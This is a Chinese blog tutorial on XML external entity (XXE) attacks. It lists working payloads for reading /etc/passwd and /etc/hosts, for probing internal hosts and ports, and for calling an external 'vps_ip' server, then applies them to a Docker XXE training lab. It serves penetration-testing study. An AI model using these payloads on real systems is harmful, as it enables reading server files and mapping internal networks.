利用XXE获取系统passwd文件

最新推荐文章于 2024-04-14 14:03:30 发布
最新推荐文章于 2024-04-14 14:03:30 发布
阅读量589 收藏
点赞数
分类专栏: 渗透测试 文章标签: xxe passwd 漏洞利用
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/liguangyao213/article/details/102790498
版权

引用外部DTD文件访问内网主机/端口。

 
<!DOCTYPE a SYSTEM "http://127.0.0.1:2333"> (看响应时间)

引用外部DTD文件访问外网。

 
<!DOCTYPE a SYSTEM "http://vps_ip" >

引用内部实体。

 
<!DOCTYPE a [<!ENTITY xxe "findneo">]><a>&xxe;</a>

外部实体读本地文件。

 
<!DOCTYPE a [<!ENTITY xxe SYSTEM "file:///etc/hosts">]><a>&xxe;</a>

外部实体访问内网主机/端口。

 
<!DOCTYPE a SYSTEM "http://192.168.1.2:80">(看响应时间)

外部实体访问外网。

 
<!DOCTYPE a [<!ENTITY xxe SYSTEM "http://vps_ip">]><a>&xxe;</a>

docker中下载rrodrigo/xxelab该镜像

启动:docker run -d -p 8082:80 rrodrigo/xxelab

 

抓取注册包,发现采用xml格式传递,且邮箱有返回:

 

将返回内容处进行xxe回显设置读取/etc/passwd

 
<?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE c [ <!ENTITY file SYSTEM "/etc/passwd"> ]>

 

利用base64编码进行xxe,防止有返回包验证

 
<?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE c [ <!ENTITY file SYSTEM "php://filter/read=convert.base64-encode/resource=/etc/passwd"> ]>

 

返回base64数据包,base64解码

mingzhi61
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
XXE漏洞-内网探测
小刚的博客
08-21 2241
作者:小刚 一位苦于信息安全的萌新小白帽,记得关注给个赞,谢谢 本实验仅用于信息防御教学,切勿用于其它用途 XXE漏洞-内网探测XXE漏洞危害CTF案例 XXE漏洞 XXE :Xml External Entity 外部实体注入攻击 是利用一种xml的语言进行的注入攻击 XXE漏洞原理就不详解了,一搜一大把 危害 可以读取系统文件 获取源代码 进行SSRF 进行Phar触发反序列化 CTF案例 本文主要是针对一个CTF题https://buuoj.cn/challenges#[NCTF2019]Tr.
XXE文件随意读取
weixin_48421613的博客
09-03 1846
XXE利用 声明: 我们本次实验所使用的php版本为5.4版本,有些版本是实验不成功的 XXE注入可分为有回显的与没有回显的 有回显的:制造一个具有xxe漏洞的代码(xxe.php) <?php $xml=simplexml_load_string($_GET['xml']); echo $xml; //这是有回显的xxe注入 ?> 首先我们使用我们本地的服务器进行探测,使用burpsuite进行抓板进行分析 我们可以看到我们提交的参数已经出
XXE漏洞
weixin_40950781的博客
09-11 1116
XXE漏洞学习0x00 XXE漏洞简介0x01 XML基础知识0x02 DTD内外部引用1. 内部引用:2. 外部引用:3. 参数化外部引用:0x03 XEE攻击思路0x04 XEE漏洞利用实验一:有回显读本地敏感文件(Normal XXE)实验二:无回显读取本地敏感文件(Blind OOB XXE)实验三 XEE的基本利用实验四 Blind OOB XXE场景1-端口扫描场景2-通过DTD窃取文...
XXE外部实体注入漏洞 学习笔记
qq_37019068的博客
10-12 1796
1. 前置知识——XML 与 DTD 名词解释 XML:指可扩展标记语言(eXtensible Markup Language)。被设计用来传输和存储数据,形似HTML,但是与其不同的是HTML被设计用于展示数据 DTD:文档类型定义(DTD)可定义合法的XML文档构建模块。它使用一系列合法的元素来定义文档的结构。 DTD可被成行地声明于 XML 文档中,也可作为一个外部引用。 DTD可被内部引用,也可以被外部引用 举例 XML内部引入DTD,即将约束规则限定在xml文档中 <?xml ve
XXE漏洞以及Blind XXE总结
热门推荐
Exploit的小站~
05-10 5万+
 转载请注明出处:http://blog.csdn.net/u011721501 0、前言 XXE漏洞是针对使用XML交互的Web应用程序的攻击方法,在XEE漏洞的基础上,发展出了BlindXXE漏洞。目前来看,XML文件作为配置文件(Spring、Struts2等)、文档结构说明文件(PDF、RSS等)、图片格式文件(SVGheader)应用比较广泛,此外,网上有一些在线XML格式...
SCAN_XXE:利用XML XXE漏洞
05-07
例如,他们可能会定义一个外部实体来引用服务器上的敏感文件(如`file:///etc/passwd`),然后在XML文档中使用这个实体,从而获取机密信息。 Python中,虽然不像PHP那样常见,但也有处理XML的库,如`xml.etree....
XXE漏洞详解【内含vulnhub靶场XXE Lab:1详解】
07-30
3. 内网探测:攻击者可以利用XXE漏洞探测内网中的服务和设备状态。 4. DoS攻击:通过大量请求外部资源,消耗服务器资源,导致服务不可用。 **三、XXE检测** 检测XXE漏洞通常分为白盒和黑盒两种方式: 1. **白盒**:...
XXE超详细讲解 全网仅此一份
07-06
3. **探测内网端口**:利用XXE,攻击者可以扫描内网中的开放端口。 4. **攻击内部网络**:结合SSRF(Server-Side Request Forgery)漏洞,攻击者可以进一步探测和攻击内部网络资源。 为了触发XXE漏洞,通常需要一个...
XXE - How to become a Jedi
02-20
### XXE漏洞详解:从入门到精通 #### XXE简介 **XXE(XML External Entity)** 漏洞是一种安全漏洞,它发生在应用程序解析 XML 数据时,未能正确过滤外部实体引用的情况。当一个恶意构造的 XML 文档被传入到易受...
Blackhat USA 2015 XXE
12-25
- **异常触发**:通过触发特定类型的异常来获取敏感信息,如通过访问本地文件系统路径引发的异常。 #### 七、Java平台的多面性 Java开发工具包(JDK)包含了多种用于处理XML数据的类库,包括`TransformerFactory`...
XXE漏洞详解
不忘初心,护天下安全!
08-09 1527
XXE XXE(XML External Entity,XML外部实体注入),这种漏洞出现一般出现在当前站点允许引用外部实体的情况下,如果攻击者构造恶意内容,就可以造成命令执行、内网端口探测等危害,如果和ssrf攻击结合,那场面那效果,如虎添翼一般。 XML 从XXE的明明也可以看得出来,XML是我们必须了解的东西。XML指可扩展标记语言,用于标记电子文件使其具有结构性。通俗来说,xml就是...
XML实体注入漏洞
08-18 628
XML实体注入漏洞 XML实体注入漏洞    测试代码1:新建xmlget.php,复制下面代码 &lt;?php $xml=$_GET['xml']; $data = simplexml_load_string($xml); print_r($data); ?&gt; 漏洞测试利用方式1:有回显,直接读取文件 &...
XXE-XML外部实体注入 漏洞详解
最新发布
m0_69043895的博客
04-14 1328
XML指可扩展标记语言(Extensible Markup Language)。XML用于标记电子文件使其具有结构性的标记语言,可以用来标记数据、定义数据类型,是一种允许用户对自己的标记语言进行定义的源语言。XML文档结构包括XML声明、DTD文档类型定义(可选)、文档元素。它在 HTML 之后开发,来弥补 HTML的不足。HTML 用于定义数据的展示,专注于它应该是什么样子。反之,XML 用于定义数据如何被组织。例如,HTML中,你的标签为<title>、<h1>、<tab1e>,<p>以及其它标签。
文件上传xlsx之XXE漏洞
LAngle9的博客
11-18 2187
1 新建一个excel文件2 修改后缀名为.zip格式3解压缩出文件夹4 文件结构如下,可以进行修改,给excel添加一些功能键可结合VBA添加事件。5修改完成后,全选文件,进行压缩。注:不要选sss文件夹来压缩,要全选文件。6 压缩文件格式选择.zip格式。7产生压缩文件8 修改后缀名9 打开文件成功,看到之前在。excel 修改设置(将excel修改后缀名,解压缩方式)_下雨了620的博客-CSDN博客_excel改为rar后没有xl。使用BURP的dnslog地址看是是否有回显。
Web安全 XXE漏洞的 测试和利用.(读取服务器的任何文件 和 收集服务器的内网信息.)
网络安全领域___专研者.
03-08 6513
XXE漏洞全称(XML External Entity Injection),即XML外部实体注入漏洞,XXE漏洞发生在应用程序解析XML输入时,没有禁止外部实体的加载,导致可加载恶意外部文件,造成:文件读取、命令执行、内网端口扫描、攻击内网网站,DOS攻击 等危害.(xxe漏洞触发的点往往是可以上传xml文件的位置的,没有对上传的xml文件进行过滤,导致可上传恶意xml文件.)
xxe 漏洞学习总结
YouthBelief的博客
12-07 1096
XXE 学习基础学习如何构建外部实体一:直接通过DTD外部实体声明二:(一般实体)通过DTD外部实体声明引入外部DTD文档,再引入外部实体声明三:(参数实体)通过DTD外部实体声明引入外部DTD文档,再引入外部实体声明。有回显适用于 无回显支持的协议靶场练习 docker XXE靶场搭建漏洞挖掘靶场练习 pikachu(win10)靶场搭建漏洞挖掘无回显情况 基础学习 XXE(XML External Entity Injection)被称为xml外部实体注入,漏洞发生在应用程序解析用户提交的xml文件时,
XXE漏洞利用详情和修复
汤圆的博客
02-12 785
简介 xxe也就是xml外部实体注入,简单理解就是当允许引用外部实体时, XML数据在传输中有可能会被不法分子被修改,如果服务器执行被恶意插入的代码,就可以实现攻击的目的攻击者可以通过构造恶意内容,就可能导致任意文件读取,系统命令执行,内网端口探测,攻击内网网站等危害。 实验环境 PHP版本:5.5.45 中间件:apache 复现平台:漏洞练习平台 利用详情 复制burp生成的地址 ,然后在x...
网络安全课第五节 XXE 漏洞的检测与防御
fegus的博客
07-11 1534
上一讲我们介绍了 SSRF 漏洞,一种专门针对服务端的请求伪造攻击,常被用于攻击内网。在里面我介绍了 Burp Collaborator 用于专门测试无回显漏洞的功能,在本讲的 XXE 漏洞测试中,我们依然可以使用,不知道你是否还记得怎么使用?下面,我们就开始今天的课程,一场关于 XML 外部实体注入(XXE)漏洞的攻防之路。XXE(XML External Entity,XML 外部实体注入)正是当允许引用外部实体时,通过构造恶意内容,导致读取任意文件、执行系统命令、内网探测与攻击等危害的一类漏洞。PHP
利用EXCEL进行XXE攻击
xu84557120的博客
01-18 5301
一、攻击原理 引用(https://xz.aliyun.com/t/3741) 0x00 前言 XML外部实体攻击非常常见,特别是通过基于HTTP的API,我们经常遇到并利用以此通常获得对客户端环境的特权访问。 不常见的是用Excel进行XXE攻击。 0x01 这是什么方式 实际上,与所有post-Office 2007文件格式一样,现代Excel文件实际上只是XML文档的zip文件。这...
利用XXE漏洞读取PHP文件内容攻击如何防范
06-08
针对利用XXE漏洞读取PHP文件内容的攻击,可以采取以下措施: 1. 避免使用外部实体。禁用或限制XML解析器的外部实体,以防止攻击者利用外部实体注入恶意代码。 2. 使用白名单机制。限制XML解析器只能访问预先定义的实体,禁止访问不受信任的实体。 3. 过滤输入。在接收到XML数据之前,对输入数据进行过滤,以删除或转义可能包含恶意代码的字符。 4. 更新XML解析器。使用最新版本的XML解析器,因为较新版本通常包含针对XXE攻击的修复程序。 5. 禁止远程文件访问。禁止XML解析器访问远程文件,以防止攻击者利用XXE漏洞读取PHP文件内容等敏感信息。 6. 隔离PHP文件。将PHP文件与其他文件隔离开来,以确保攻击者无法利用XXE漏洞读取PHP文件内容。 以上措施可以帮助防止利用XXE漏洞读取PHP文件内容的攻击,保护系统的安全。但是,最好的方法是使用安全的编程实践和审查代码,以防止XXE漏洞的出现。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

mingzhi61

你的打赏,是我创造最大的动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值